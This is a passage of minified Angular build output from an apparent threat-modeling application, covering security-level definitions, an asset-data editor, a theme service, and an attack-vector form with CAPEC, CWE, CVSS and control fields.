requirement","requirementTypeIDs":["b008aede-3518-44f3-8cc2-7e92b68e0329","d47f441d-e3bf-461d-b724-47a90c19bc89","83a019dd-d28b-4f3d-bf48-e254d2031445","b7bcf087-c925-4eec-9a11-e042250afbf1","f28381c7-5c24-4fd3-b75e-03fbebe03857","bd31bc1e-43ed-48f2-80ae-885680bcd378","40670f38-5fd9-47a3-994b-41a271a71694","72982bda-38dc-4904-8080-4e7a37df743d","ccb81ee9-073d-4deb-aed5-7972b2d212a3","da50a4ec-ca68-4c4e-a8a7-0a71ba408c4a","370cc79b-a473-4247-b171-4ad0233a0a34","a8e6d55e-3440-46b1-8624-bcb1bd8364cc","c5230fd4-d5f9-4229-8f71-170617397b3a","65a904e7-9c92-4932-946e-042b19d5c7c9","dda8e95b-17ba-465f-a789-430d5a378ee1","ff84fa60-5084-438a-9536-7f2fb011c9b3","8cfe7593-93b6-4b0c-a715-caddbc7d18cb","532c1932-789e-4fbb-8167-6d63eb789c92","401ef547-ea2c-4398-8015-66490cb02976","37d9f118-5bb7-4691-976b-2c949172dce3","5740c4a1-403c-482a-a235-fff4444fb92e","6b2fb862-508c-4b88-a2f6-a3b2ecfa08bc","3e691ca4-eb77-4be1-902e-04c75aefcd00","3af81552-bb3f-4125-99d2-6127fa74c428","779d3751-b9bd-4e97-80db-70a0631181ad","ed08bb4b-7e98-47b1-bf97-cbce20a304cd","5c662093-fd9f-4861-ae05-41f91e6a3514","0317d147-90d9-4879-bf07-6e167c0dc533","3d164cce-adde-41cd-9470-c0e60ff22559","77a29d2d-372e-4c12-b538-81f95afd6e0b","956c289a-0cd4-4e8c-831a-b327c8dbbde5","2615ae9d-2dad-47c1-81b3-fc4c9e73ba36","79bd4891-d677-4c06-91d6-3bc414e59193","c5b4aa95-a00a-42b3-96ca-31d98557a19c","b26d4748-2b7c-4821-b11a-f51fd7e85307","8a51e9e7-b87f-4d62-85df-288320d456f1","13a182cc-6caa-4193-8fd2-4b497e0a16ed","9c8a4b08-ce26-467d-8d7d-bf9db81f8944","63a333db-4074-4ebc-9fa5-63a248e9e3e1","b6dcb790-3ce2-4635-839e-3b2032499ffa","0d163821-ac6f-4969-81d6-821afc8f181e","1291f5d2-f6eb-49f3-a437-c8bccad2d0f8","4da5a2ec-cfb7-497c-9c0c-f2d4a784e9a9","f74ea015-618a-4553-86b8-c2917ff637ae","41defa29-c849-4680-847b-9f40fabc7286","ac95cfac-e4b9-4639-a066-3bf7df6c7c73","1a731a13-8b40-4b33-aa7f-286a3bc2882a","e62acf0c-4013-468c-9bb7-7940d0270e69","57d7ca9b-b06e-4273-800f-8caa19dfb1e7","4b10fb26-5b3a-41e7-b7d2-4c31b4cb92f6","fbd84ea0-43a1-4b39-ae16-bba8bb7c102c","d6b5b544-3184-43ba-bc05-ae90bf503067","15b54837-a7f6-4e95-8773-9b999abfa998","2e279fd1-f688-4c9a-aee2-abff49d6b1ab","db2383ba-3aba-408b-8317-6c10af37d1ea","d30db9ad-4a71-4e14-bc8f-718834d56e03","d8332abf-0ac2-4096-bde8-02f5716ba15e","b4c58d1f-016b-4244-baf3-e2ee57eff599","88e8ef92-3f66-4c19-8a67-d2a2d97abeb2","926c6b5b-0a1f-4833-a612-97691a10d83f","6cefc8a9-b69b-4197-961c-dbbc27cbd23b","4854fee5-99e3-4c4b-8b53-4c37629005d0","8ed9c57b-fbe4-435a-8036-501cf5a95f3e","98d81760-6978-4372-809a-8303352c53b7","b06635ce-dc29-44de-a719-81829a3962de","72adfa45-cc4e-4539-ad87-99d1f46f4eab","798e83ee-b5ad-46c2-8bd5-58c968e8390a","64064d6d-e701-4ebf-ab84-3f702b32b8ff","d07a5fcc-e3fa-4525-8253-e5463c56a905","1936692f-af1c-4335-b9c4-60ff1da57ae1","0c455f28-1b52-4d02-b358-fc13ae9c2e85","2b6d967f-e572-4e6a-a5dd-11cdce427df4","1cb6a6d6-6c8b-431e-8eaa-5f3604c2e153","08cf1ab2-c34b-473e-a332-4e99c616db7d","8d84eb63-48d8-41e8-aeb1-ef767a5fb572"],"Levels":[{"Name":"Security Level 1","Abbr":"SL1","Description":"Prevent the unauthorized disclosure of information via eavesdropping or causal exposure"},{"Name":"Security Level 2","Abbr":"SL2","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using simple means with low resources, generic skills and low motivation "},{"Name":"Security Level 3","Abbr":"SL3","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with moderate resources, IACS specific skills and moderate motivation "},{"Name":"Security Level 4","Abbr":"SL4","Description":"Prevent the unauthorized disclosure of information to an entity actively searching for it using sophisticated means with extended resources, IACS specific skills and high motivation"}]}]}');function Cwe(t,a){if(1&t){const e=Ye();m(0,"button",13),he("click",function(){return be(e),Me(B().myData.Name="")}),oe(1,"translate"),s(2,"\n      "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n    "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function ywe(t,a){1&t&&(m(0,"mat-hint",14),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct("\n      ",re(2,1,"messages.error.numberAlreadyExists"),"\n    "))}function bwe(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B();V("value",e),C(1),ke(re(2,2,i.GetSensitivity(e)))}}function Mwe(t,a){if(1&t){const e=Ye();m(0,"mat-option",19),he("click",function(){const r=be(e).$implicit;return Me(B(3).SetAssetGroup(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function vwe(t,a){if(1&t&&(m(0,"mat-optgroup",17),s(1,"\n        "),ne(2,Mwe,2,3,"mat-option",18),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Key),C(2),V("ngForOf",e.Value)}}function Awe(t,a){if(1&t&&(m(0,"mat-form-field",0),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",15),s(7,"\n      "),ne(8,vwe,4,2,"mat-optgroup",16),s(9,"\n    "),u(),s(10,"\n  "),u()),2&t){const e=B();C(3),ke(re(4,3,"general.Assets")),C(3),V("value",e.GetAssetGroup()),C(2),V("ngForOf",e.GetAssetGroups())}}function Twe(t,a){if(1&t){const e=Ye();m(0,"table",20),s(1,"\n      "),m(2,"tr")(3,"td")(4,"mat-checkbox",21),he("change",function(){const r=be(e).$implicit,c=B();return Me(c.ImpactCatChanged(c.myData,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n    "),u()}if(2&t){const e=a.$implicit,i=B();C(4),V("checked",i.myData.ImpactCats.includes(e)),C(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let v5=(()=>{class t{constructor(e,i){this.dataService=i,this.showAssetGroup=!1,e&&(this.myData=e,this.showAssetGroup=!0)}ngOnInit(){if(this.assetGroups=[],this.myData.IsProjectData){const e=this.dataService.Project.GetProjectAssetGroup();let i={Key:e.Name,Value:[e,...e.GetGroupsFlat()]};this.assetGroups.push(i),this.dataService.Project.GetDevices().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)}),this.dataService.Project.GetMobileApps().filter(n=>n.AssetGroup).forEach(n=>{let r={Key:n.Name,Value:[n.AssetGroup,...n.AssetGroup.GetGroupsFlat()]};this.assetGroups.push(r)})}else this.assetGroups.push({Key:"Assets",Value:[this.dataService.Config.AssetGroups,...this.dataService.Config.AssetGroups.GetGroupsFlat()]})}SetAssetGroup(e){let i=this.GetAssetGroup();i&&i.RemoveMyData(this.myData),e.AddMyData(this.myData)}GetAssetGroups(){return this.assetGroups}GetAssetGroup(){return this.myData.FindAssetGroup()}GetSensitivity(e){return An.ToString(e)}GetSensitivities(){return An.GetKeys()}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Pu,8),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-mydata"]],inputs:{myData:"myData",showAssetGroup:"showAssetGroup"},decls:63,vars:31,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","70px","float","right","margin-left","10px"],["matInput","","type","number","min","0","required","","matTooltipShowDelay","1000",3,"ngModel","matTooltip","ngModelChange"],["style","color: red;","class","alert alert-danger",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5","type","text",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill","class","property-form-field",4,"ngIf"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[1,"alert","alert-danger",2,"color","red"],[3,"value"],[3,"label",4,"ngFor","ngForOf"],[3,"label"],["matTooltipShowDelay","1000",3,"value","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip","click"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n  "),m(2,"mat-form-field",0),s(3,"\n    "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n    "),m(8,"input",1),he("ngModelChange",function(r){return i.myData.Name=r}),u(),s(9,"\n    "),ne(10,Cwe,6,3,"button",2),s(11,"\n  "),u(),s(12,"\n  "),m(13,"mat-form-field",3),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"input",4),he("ngModelChange",function(r){return i.myData.Number=r}),u(),s(20,"\n    "),ne(21,ywe,3,3,"mat-hint",5),s(22,"\n  "),u(),s(23,"\n  "),it(24,"br"),s(25,"\n  "),m(26,"mat-form-field",6),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"textarea",7),he("ngModelChange",function(r){return i.myData.Description=r}),u(),s(33,"\n  "),u(),s(34,"\n  "),it(35,"br"),s(36,"\n  "),m(37,"mat-form-field",0),s(38,"\n    "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n    "),m(43,"mat-select",8),he("valueChange",function(r){return i.myData.Sensitivity=r}),oe(44,"translate"),s(45,"\n      "),ne(46,bwe,3,4,"mat-option",9),s(47,"\n    "),u(),s(48,"\n  "),u(),s(49,"\n  "),it(50,"br"),s(51,"\n  "),ne(52,Awe,11,5,"mat-form-field",10),s(53,"\n  "),m(54,"h3"),s(55),oe(56,"translate"),u(),s(57,"\n  "),m(58,"div",11),s(59,"\n    "),ne(60,Twe,8,4,"table",12),s(61,"\n  "),u(),s(62,"\n"),u()),2&e&&(C(5),ke(re(6,19,"general.Name")),C(3),at("matTooltip",i.myData.Name),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Name),C(2),V("ngIf",i.myData.Name),C(6),ke(re(17,21,"general.Number")),C(3),at("matTooltip",i.myData.Number),V("ngModel",i.myData.Number),C(2),V("ngIf",i.myData.CheckUniqueNumber()),C(8),ke(re(30,23,"properties.Description")),C(3),V("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.myData.Description),C(8),ke(re(41,25,"properties.Sensitivity")),C(3),at("matTooltip",re(44,27,i.GetSensitivity(i.myData.Sensitivity))),V("value",i.myData.Sensitivity),C(3),V("ngForOf",i.GetSensitivities()),C(6),V("ngIf",i.showAssetGroup),C(3),ke(re(56,29,"properties.ImpactCategories")),C(5),V("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,Ri,an,Ac,Ta,gm,Dd,Ea,oa,br,da,nn,fp,un,jr,Nr,yr,gg,Go,Xa,Pa,Xi],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})(),Oa=(()=>{class t{constructor(e){this.locStorageService=e,this.ThemeChanged=new Tt,this.IsDarkMode=!0,setTimeout(()=>{let i=this.locStorageService.Get(si.DARK_MODE);this.SetDarkMode(null==i?this.IsDarkMode:"true"==i)},100)}get Color2(){return this.IsDarkMode?"#252525":"#F5F5F5"}SetDarkMode(e){this.ThemeChanged.emit(e),this.IsDarkMode=e,this.locStorageService.Set(si.DARK_MODE,String(this.IsDarkMode))}}return t.\u0275fac=function(e){return new(e||t)(At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ewe(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(B(3).attackVector.Name="")}),oe(1,"translate"),s(2,"\n        "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n      "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Dwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",29),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",30),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.Name=n)}),u(),s(9,"\n      "),ne(10,Ewe,6,3,"button",31),s(11,"\n    "),u(),s(12,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,5,"properties.Name")),C(3),at("matTooltip",e.attackVector.Name),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.attackVector.Name),C(2),V("ngIf",e.attackVector.Name)}}function xwe(t,a){if(1&t&&(bt(0),s(1,"\n                "),m(2,"mat-option",35),s(3),u(),s(4,"\n              "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n                  ",e.Name,"\n                ")}}function wwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n              "),ne(2,xwe,5,2,"ng-container",34),s(3,"\n            "),u()),2&t){const e=B().$implicit;V("label",e.Name),C(2),V("ngForOf",e.SubGroups)}}function Iwe(t,a){if(1&t&&(bt(0),s(1,"\n            "),m(2,"mat-option",35),s(3),u(),s(4,"\n            "),ne(5,wwe,4,2,"mat-optgroup",36),s(6,"\n          "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n              ",e.Name,"\n            "),C(2),V("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function Rwe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n          "),ne(2,Iwe,7,3,"ng-container",34),s(3,"\n        "),u()),2&t){const e=B().$implicit;V("label",e.Name),C(2),V("ngForOf",e.SubGroups)}}function Swe(t,a){if(1&t&&(bt(0),s(1,"\n        "),m(2,"mat-option",35),s(3),u(),s(4,"\n        "),ne(5,Rwe,4,2,"mat-optgroup",36),s(6,"\n      "),Mt()),2&t){const e=a.$implicit;C(2),V("value",e.ID),C(1),ct("\n          ",e.Name,"\n        "),C(2),V("ngIf",e.SubGroups&&e.SubGroups.length>0)}}function kwe(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",29),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-select",33),he("selectionChange",function(n){return be(e),Me(B(2).OnGroupChanged(n))}),s(7,"\n      "),ne(8,Swe,7,3,"ng-container",34),s(9,"\n\n    "),u(),s(10,"\n  "),u()}if(2&t){const e=B(2);let i,n;C(3),ke(re(4,4,"general.Group")),C(3),at("matTooltip",null==(i=e.GetAttackVectorGroup())?null:i.Name),V("value",null==(n=e.GetAttackVectorGroup())?null:n.ID),C(2),V("ngForOf",e.GetRootAttackVectorGroups())}}function Pwe(t,a){if(1&t&&(m(0,"mat-option",39),s(1),u()),2&t){const e=a.$implicit;at("matTooltip",e.Description),V("value",e),C(1),ct("\n          ",e.Name,"\n        ")}}function Owe(t,a){if(1&t&&(m(0,"mat-optgroup",37),s(1,"\n        "),ne(2,Pwe,2,3,"mat-option",38),s(3,"\n      "),u()),2&t){const e=a.$implicit;V("label",e.Name),C(2),V("ngForOf",e.ThreatCategories)}}function Nwe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Lwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=B(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatIntroduced,r))}),u()()}if(2&t){const e=a.$implicit,i=B(2);C(1),V("checked",i.attackVector.ThreatIntroduced.includes(e))}}function zwe(t,a){if(1&t&&(m(0,"td",40),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Wwe(t,a){if(1&t){const e=Ye();m(0,"td",8)(1,"mat-checkbox",41),he("change",function(){const r=be(e).$implicit,c=B(2);return Me(c.LifeCycleChanged(c.attackVector.ThreatExploited,r))}),u()()}if(2&t){const e=a.$implicit,i=B(2);C(1),V("checked",i.attackVector.ThreatExploited.includes(e))}}function Fwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetAttackVectorTypeName(e)))}}function Vwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",13),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.AttackTechnique.CAPECID=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,2,"properties.CAPECID")),C(3),V("ngModel",e.attackVector.AttackTechnique.CAPECID)}}function Bwe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-form-field",13),s(3,"\n      "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"input",42),he("ngModelChange",function(n){return be(e),Me(B(2).attackVector.Weakness.CWEID=n)}),u(),s(9,"\n    "),u(),s(10,"\n  "),Mt()}if(2&t){const e=B(2);C(5),ke(re(6,2,"properties.CWEID")),C(3),V("ngModel",e.attackVector.Weakness.CWEID)}}function Hwe(t,a){if(1&t&&(m(0,"mat-option",35),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function Uwe(t,a){if(1&t&&(m(0,"mat-card",45),s(1,"\n      "),m(2,"mat-card-title"),s(3),u(),s(4,"\n      "),m(5,"mat-card-content"),s(6,"\n        "),it(7,"app-capec-entry",46),s(8,"\n      "),u(),s(9,"\n    "),u()),2&t){const e=B(3);C(3),ct("CAPEC-",e.attackVector.AttackTechnique.CAPECID,""),C(4),V("capecID",e.attackVector.AttackTechnique.CAPECID)}}function qwe(t,a){if(1&t&&(bt(0),s(1,"\n    "),it(2,"app-cvss-entry",43),s(3,"\n    "),ne(4,Uwe,10,2,"mat-card",44),s(5,"\n  "),Mt()),2&t){const e=B(2);C(2),V("entry",e.attackVector.AttackTechnique.CVSS),C(2),V("ngIf",e.attackVector.AttackTechnique.CAPECID)}}function Gwe(t,a){if(1&t&&(m(0,"mat-card"),s(1,"\n      "),m(2,"mat-card-title"),s(3),u(),s(4,"\n      "),m(5,"mat-card-content"),s(6,"\n        "),it(7,"app-cwe-entry",47),s(8,"\n      "),u(),s(9,"\n    "),u()),2&t){const e=B(3);C(3),ct("CWE-",e.attackVector.Weakness.CWEID,""),C(4),V("cweID",e.attackVector.Weakness.CWEID)}}function jwe(t,a){if(1&t&&(bt(0),s(1,"\n    "),ne(2,Gwe,10,2,"mat-card",1),s(3,"\n  "),Mt()),2&t){const e=B(2);C(2),V("ngIf",e.attackVector.Weakness.CWEID)}}function Qwe(t,a){if(1&t){const e=Ye();m(0,"button",21),he("click",function(){const r=be(e).$implicit;return Me(B(2).AddExistingControl(r))}),s(1),u()}if(2&t){const e=a.$implicit;C(1),ke(e.Name)}}function $we(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",48),he("click",function(){const r=be(e).$implicit;return Me(B(2).selectedControl=r)}),s(1,"\n          "),m(2,"mat-icon",49),s(3,"arrow_right"),u(),s(4,"\n          "),m(5,"div",50),s(6),oe(7,"translate"),u(),s(8,"\n          "),m(9,"button",51),he("click",function(){const r=be(e).$implicit;return Me(B(2).RemoveControl(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n          "),m(14,"button",52),he("click",function(){const r=be(e).$implicit;return Me(B(2).DeleteControl(r))}),oe(15,"translate"),m(16,"mat-icon"),s(17,"delete"),u()(),s(18,"\n        "),u()}if(2&t){const e=a.$implicit,i=B(2);Ct("highlight-light",i.selectedControl===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedControl===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),C(6),ke(re(7,8,e.Name)),C(3),at("matTooltip",re(10,10,"general.Remove")),C(5),at("matTooltip",re(15,12,"general.Delete"))}}function Kwe(t,a){if(1&t&&(m(0,"div",53),s(1,"\n        "),it(2,"app-control",54),s(3,"\n      "),u()),2&t){const e=B(2);C(2),V("control",e.selectedControl)("canEditName",!0)("canEditGroup",!0)}}function Xwe(t,a){if(1&t&&(s(0,"\n          "),it(1,"app-threat-rule",58),s(2,"\n        ")),2&t){const e=B().$implicit;C(1),V("canEdit",!1)("showAttackVector",!1)("threatRule",e)}}function Ywe(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n        "),m(2,"mat-expansion-panel-header"),s(3,"\n          "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n          "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10,"info"),u(),s(11,"\n          "),u(),s(12,"\n        "),u(),s(13,"\n        "),ne(14,Xwe,3,3,"ng-template",57),s(15,"\n      "),u()),2&t){const e=a.$implicit,i=B(3);C(5),ct("\n            ",e.Name,"\n          "),C(3),ct("\n            ",i.GetThreatRestriction(e),"\n            ")}}function Jwe(t,a){if(1&t&&(m(0,"div",55),s(1,"\n    "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"mat-accordion",56),s(7,"\n      "),ne(8,Ywe,16,2,"mat-expansion-panel",34),s(9,"\n    "),u(),s(10,"\n    "),it(11,"br"),s(12,"\n  "),u()),2&t){const e=B(2);C(3),ke(re(4,2,"general.ThreatRules")),C(5),V("ngForOf",e.GetThreatRules())}}function Zwe(t,a){1&t&&(m(0,"div",55),s(1," \n    "),m(2,"strong"),s(3),oe(4,"translate"),u(),s(5,"\n  "),u()),2&t&&(C(3),ke(re(4,1,"pages.config.threatlibrary.noRuleOrQuestion")))}function e8e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n  "),ne(2,Dwe,13,7,"ng-container",1),s(3,"\n  "),m(4,"mat-form-field",2),s(5,"\n    "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n    "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().attackVector.Description=n)}),u(),s(11,"\n  "),u(),s(12,"\n  "),m(13,"mat-form-field",2),s(14,"\n    "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n    "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(B().attackVector.Adversaries=n)}),u(),s(20,"\n  "),u(),s(21,"\n  "),ne(22,kwe,11,6,"mat-form-field",4),s(23,"\n  "),m(24,"mat-form-field",2),s(25,"\n    "),m(26,"mat-label"),s(27),oe(28,"translate"),u(),s(29,"\n    "),m(30,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().attackVector.ThreatCategories=n)}),s(31,"\n      "),ne(32,Owe,4,2,"mat-optgroup",6),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n  "),m(36,"table",7),s(37,"\n    "),m(38,"tr"),s(39,"\n      "),m(40,"td",8)(41,"strong"),s(42),oe(43,"translate"),u()(),s(44,"\n      "),ne(45,Nwe,3,3,"td",9),s(46,"\n    "),u(),s(47,"\n    "),m(48,"tr"),s(49,"\n      "),m(50,"td",8)(51,"strong"),s(52),oe(53,"translate"),u()(),s(54,"\n      "),ne(55,Lwe,2,1,"td",10),s(56,"\n    "),u(),s(57,"\n    "),m(58,"tr"),s(59,"\n      "),m(60,"td",8)(61,"strong"),s(62),oe(63,"translate"),u()(),s(64,"\n      "),ne(65,zwe,3,3,"td",9),s(66,"\n    "),u(),s(67,"\n    "),m(68,"tr"),s(69,"\n      "),m(70,"td",8)(71,"strong"),s(72),oe(73,"translate"),u()(),s(74,"\n      "),ne(75,Wwe,2,1,"td",10),s(76,"\n    "),u(),s(77,"\n  "),u(),s(78,"\n  "),m(79,"mat-form-field",11),s(80,"\n    "),m(81,"mat-label"),s(82),oe(83,"translate"),u(),s(84,"\n    "),m(85,"mat-select",5),he("valueChange",function(n){return be(e),Me(B().attackVector.OriginTypes=n)}),s(86,"\n      "),ne(87,Fwe,3,4,"mat-option",12),s(88,"\n    "),u(),s(89,"\n  "),u(),s(90,"\n  "),ne(91,Vwe,11,4,"ng-container",1),s(92,"\n  "),ne(93,Bwe,11,4,"ng-container",1),s(94,"\n  "),m(95,"mat-form-field",13),s(96,"\n    "),m(97,"mat-label"),s(98),oe(99,"translate"),u(),s(100,"\n    "),m(101,"mat-select",14),he("valueChange",function(n){return be(e),Me(B().attackVector.Severity=n)}),s(102,"\n      "),m(103,"mat-option"),s(104),oe(105,"translate"),u(),s(106,"\n      "),ne(107,Hwe,3,4,"mat-option",12),s(108,"\n    "),u(),s(109,"\n  "),u(),s(110,"\n  "),ne(111,qwe,6,2,"ng-container",1),s(112,"\n  "),ne(113,jwe,4,1,"ng-container",1),s(114,"\n  "),m(115,"div",15),s(116,"\n    "),m(117,"div",16),s(118,"\n      "),m(119,"mat-list",17),he("cdkDropListDropped",function(n){be(e);const r=B();return Me(r.dropControl(n,r.GetControls()))}),s(120,"\n        "),m(121,"div",18),s(122),oe(123,"translate"),m(124,"button",19),oe(125,"translate"),m(126,"mat-icon"),s(127,"add"),u()(),s(128,"\n          "),m(129,"mat-menu",null,20),s(131,"\n            "),m(132,"button",21),he("click",function(){return be(e),Me(B().AddControl())}),s(133),oe(134,"translate"),u(),s(135,"\n            "),m(136,"button",22),s(137),oe(138,"translate"),u(),s(139,"\n          "),u(),s(140,"\n          "),m(141,"mat-menu",null,23),s(143,"\n            "),ne(144,Qwe,2,1,"button",24),s(145,"\n          "),u(),s(146,"\n        "),u(),s(147,"\n        "),ne(148,$we,19,14,"mat-list-item",25),s(149,"\n      "),u(),s(150,"\n    "),u(),s(151,"\n    "),m(152,"div",26),s(153,"\n      "),ne(154,Kwe,4,3,"div",27),s(155,"\n    "),u(),s(156,"\n  "),u(),s(157,"\n  "),ne(158,Jwe,13,4,"div",28),s(159,"\n  "),ne(160,Zwe,6,3,"div",28),s(161,"\n"),u()}if(2&t){const e=Ti(130),i=Ti(142),n=B();Ct("disable",!n.canEdit),C(2),V("ngIf",n.isShownInDialog),C(5),ke(re(8,47,"properties.Description")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Description),C(6),ke(re(17,49,"properties.Adversaries")),C(3),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.attackVector.Adversaries),C(3),V("ngIf",n.isShownInDialog||!n.canEdit),C(5),ke(re(28,51,"general.ThreatCategories")),C(3),V("value",n.attackVector.ThreatCategories),C(2),V("ngForOf",n.GetThreatCategoryGroups()),C(10),ke(re(43,53,"pages.config.attackvector.introduced")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(53,55,"pages.config.attackvector.during")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(63,57,"pages.config.attackvector.exploitable")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(73,59,"pages.config.attackvector.during")),C(3),V("ngForOf",n.GetLifeCycles()),C(7),ke(re(83,61,"properties.AttackVectorType")),C(3),V("value",n.attackVector.OriginTypes),C(2),V("ngForOf",n.GetAttackVectorTypes()),C(4),V("ngIf",n.attackVector.OriginTypes.includes(2)),C(2),V("ngIf",n.attackVector.OriginTypes.includes(1)),C(5),ke(re(99,63,"properties.Severity")),C(3),V("value",n.attackVector.Severity),C(3),ke(re(105,65,"properties.selectNone")),C(3),V("ngForOf",n.GetSeverityTypes()),C(4),V("ngIf",n.attackVector.OriginTypes.includes(2)),C(2),V("ngIf",n.attackVector.OriginTypes.includes(1)),C(6),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),C(3),ct("",re(123,67,"general.Controls")," \n          "),C(2),at("matTooltip",re(125,69,"general.Add")),V("matMenuTriggerFor",e),C(9),ke(re(134,71,"general.New")),C(3),V("matMenuTriggerFor",i),C(1),ke(re(138,73,"general.Existing")),C(7),V("ngForOf",n.GetPossibleControls()),C(4),V("ngForOf",n.GetControls()),C(6),V("ngIf",n.selectedControl),C(4),V("ngIf",n.GetThreatRules().length>0),C(2),V("ngIf",0==n.GetThreatRules().length)}}let jg=(()=>{class 